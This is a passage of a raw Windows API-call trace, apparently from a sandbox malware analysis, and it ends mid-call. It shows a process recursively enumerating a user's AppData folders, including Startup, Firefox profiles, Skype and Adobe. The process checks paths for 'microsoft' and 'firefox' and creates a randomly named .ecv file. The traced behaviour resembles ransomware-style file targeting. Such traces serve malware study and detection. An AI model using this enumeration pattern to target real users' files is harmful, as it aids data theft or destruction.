PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs", pszFile="Maintenance" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance" [0083.445] PathCombineW (in: pszDest=0x18ce10, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\*" [0083.445] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.445] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.445] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs", pszFile="Startup" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup" [0083.445] PathCombineW (in: pszDest=0x18ce10, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\*" [0083.445] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.445] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.446] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.446] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.446] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows", pszFile="Templates" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Templates") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Templates" [0083.446] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Templates", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\*" [0083.446] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.446] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.446] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows", pszFile="Themes" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Themes") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Themes" [0083.446] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Themes", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\*" [0083.446] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.446] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.446] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.446] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="Word" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Word") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Word" [0083.446] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Word", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Word\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Word\\*" [0083.446] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Word\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.446] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Word", pszFile="STARTUP" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP" [0083.446] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\*" [0083.446] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.446] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.446] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.446] FindClose (in: hFindFile=0x586b60 | out: hFindFile=0x586b60) returned 1 [0083.447] PathCombineW (in: pszDest=0x18e4b8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming", pszFile="Mozilla" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla" [0083.447] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\*" [0083.447] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\*", lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 0x586b60 [0083.447] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla", pszFile="Extensions" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Extensions") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Extensions" [0083.447] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Extensions", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Extensions\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Extensions\\*" [0083.447] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Extensions\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.447] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.447] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla", pszFile="Firefox" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox" [0083.447] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\*" [0083.447] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.447] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox", pszFile="Crash Reports" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports" [0083.447] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\*" [0083.447] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.447] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.447] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox", pszFile="Profiles" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" [0083.447] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*" [0083.447] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.447] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.447] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.448] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.448] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.448] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.448] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.448] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\*", lpFindFileData=0x18c738 | out: lpFindFileData=0x18c738) returned 0x586ca0 [0083.449] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\*", lpFindFileData=0x18c2b0 | out: lpFindFileData=0x18c2b0) returned 0x586ce0 [0083.449] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\*", lpFindFileData=0x18be28 | out: lpFindFileData=0x18be28) returned 0x586d20 [0083.449] FindClose (in: hFindFile=0x586d20 | out: hFindFile=0x586d20) returned 1 [0083.449] FindClose (in: hFindFile=0x586ce0 | out: hFindFile=0x586ce0) returned 1 [0083.449] FindClose (in: hFindFile=0x586ca0 | out: hFindFile=0x586ca0) returned 1 [0083.449] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.449] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\minidumps\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.449] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.449] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.449] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\changes\\*", lpFindFileData=0x18c738 | out: lpFindFileData=0x18c738) returned 0x586ca0 [0083.449] FindClose (in: hFindFile=0x586ca0 | out: hFindFile=0x586ca0) returned 1 [0083.449] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\failed\\*", lpFindFileData=0x18c738 | out: lpFindFileData=0x18c738) returned 0x586ca0 [0083.449] FindClose (in: hFindFile=0x586ca0 | out: hFindFile=0x586ca0) returned 1 [0083.450] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\toFetch\\*", lpFindFileData=0x18c738 | out: lpFindFileData=0x18c738) returned 0x586ca0 [0083.450] FindClose (in: hFindFile=0x586ca0 | out: hFindFile=0x586ca0) returned 1 [0083.450] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.450] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.450] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.450] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.450] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.450] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.450] FindClose (in: hFindFile=0x586b60 | out: hFindFile=0x586b60) returned 1 [0083.450] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype\\*", lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 0x586b60 [0083.450] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype\\RootTools\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.450] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.450] FindClose (in: hFindFile=0x586b60 | out: hFindFile=0x586b60) returned 1 [0083.450] FindClose (in: hFindFile=0x586b20 | out: hFindFile=0x586b20) returned 1 [0083.450] PathFindExtensionW (pszPath="rO4p00rRfog3ie0eV3.lnk") returned=".lnk" [0083.451] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\rO4p00rRfog3ie0eV3.ecv" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\ro4p00rrfog3ie0ev3.ecv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x148 [0083.451] CloseHandle (hObject=0x148) returned 1 [0083.451] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 0 [0083.451] GetNamedSecurityInfoW () returned 0x0 [0083.451] LocalFree (hMem=0x571fe8) returned 0x0 [0083.451] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming", lpSrch="microsoft") returned 0x0 [0083.451] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming", lpSrch="firefox") returned 0x0 [0083.451] PathCombineW (in: pszDest=0x18e298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\*" [0083.451] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\*", lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 0x586b20 [0083.451] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.452] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.452] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.452] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.452] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.452] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.452] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.452] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.452] PathCombineW (in: pszDest=0x18e298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming", pszFile="Adobe" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe" [0083.452] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe") returned 0 [0083.452] GetNamedSecurityInfoW () returned 0x0 [0083.452] LocalFree (hMem=0x572028) returned 0x0 [0083.452] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe", lpSrch="microsoft") returned 0x0 [0083.452] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe", lpSrch="firefox") returned 0x0 [0083.452] PathCombineW (in: pszDest=0x18de20, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\*" [0083.452] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\*", lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 0x586b60 [0083.452] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 1 [0083.452] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 1 [0083.452] PathCombineW (in: pszDest=0x18de20, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe", pszFile="Acrobat" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat" [0083.452] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat") returned 0 [0083.452] GetNamedSecurityInfoW () returned 0x0 [0083.452] LocalFree (hMem=0x571fe8) returned 0x0 [0083.452] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat", lpSrch="microsoft") returned 0x0 [0083.452] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat", lpSrch="firefox") returned 0x0 [0083.452] PathCombineW (in: pszDest=0x18d9a8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\*" [0083.452] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\*", lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 0x586ba0 [0083.453] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 1 [0083.453] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 1 [0083.453] PathCombineW (in: pszDest=0x18d9a8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat", pszFile="10.0" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0" [0083.453] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0") returned 0 [0083.453] GetNamedSecurityInfoW () returned 0x0 [0083.453] LocalFree (hMem=0x572028) returned 0x0 [0083.453] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0", lpSrch="microsoft") returned 0x0 [0083.453] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0", lpSrch="firefox") returned 0x0 [0083.453] PathCombineW (in: pszDest=0x18d530, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\*" [0083.453] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0x18d738 | out: lpFindFileData=0x18d738) returned 0x586be0 [0083.453] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d738 | out: lpFindFileData=0x18d738) returned 1 [0083.453] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d738 | out: lpFindFileData=0x18d738) returned 1 [0083.453] PathCombineW (in: pszDest=0x18d530, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0", pszFile="Collab" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab" [0083.453] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab") returned 1 [0083.453] GetNamedSecurityInfoW () returned 0x0 [0083.453] LocalFree (hMem=0x571fe8) returned 0x0 [0083.453] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab", lpSrch="microsoft") returned 0x0 [0083.453] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab", lpSrch="firefox") returned 0x0 [0083.453] PathCombineW (in: pszDest=0x18d0b8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\*" [0083.453] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\*", lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 0x586c20 [0083.454] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 1 [0083.454] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 0 [0083.454] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.454] Sleep (dwMilliseconds=0x0) [0083.455] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d738 | out: lpFindFileData=0x18d738) returned 1 [0083.455] PathCombineW (in: pszDest=0x18d530, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0", pszFile="Forms" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms" [0083.455] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms") returned 1 [0083.455] GetNamedSecurityInfoW () returned 0x0 [0083.455] LocalFree (hMem=0x572028) returned 0x0 [0083.455] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms", lpSrch="microsoft") returned 0x0 [0083.455] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms", lpSrch="firefox") returned 0x0 [0083.455] PathCombineW (in: pszDest=0x18d0b8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\*" [0083.455] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\*", lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 0x586c20 [0083.455] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 1 [0083.455] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 0 [0083.455] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.455] Sleep (dwMilliseconds=0x0) [0083.455] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d738 | out: lpFindFileData=0x18d738) returned 1 [0083.456] PathCombineW (in: pszDest=0x18d530, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0", pszFile="JavaScripts" | out: 